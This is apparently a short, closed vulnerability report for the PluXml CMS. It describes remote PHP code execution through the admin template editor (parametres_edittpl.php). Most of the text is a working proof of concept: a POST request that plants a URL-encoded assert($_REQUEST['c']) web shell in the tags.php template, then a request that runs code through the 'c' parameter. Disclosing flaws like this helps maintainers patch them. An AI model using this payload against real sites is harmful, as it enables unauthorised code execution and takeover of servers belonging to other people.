Closed
Description
The theme edit function /PluXml/core/admin/parametres_edittpl.php allows remote attackers to execute arbitrary PHP code by placing this code into a template.
Poc:
/PluXml/core/admin/parametres_edittpl.php [POST]token=603b37bed4a91d8b18a3507c46ae27df644a2ff4&template=%2Ftags.php&submit=Save+the+file&tpl=%2Ftags.php&content=%3C%3Fphp+assert%28%24_REQUEST%5B%27c%27%5D%29%3B%3F%3E%0D%0A

then visit /PluXml/themes/defaut/tags.php?c=phpinfo();
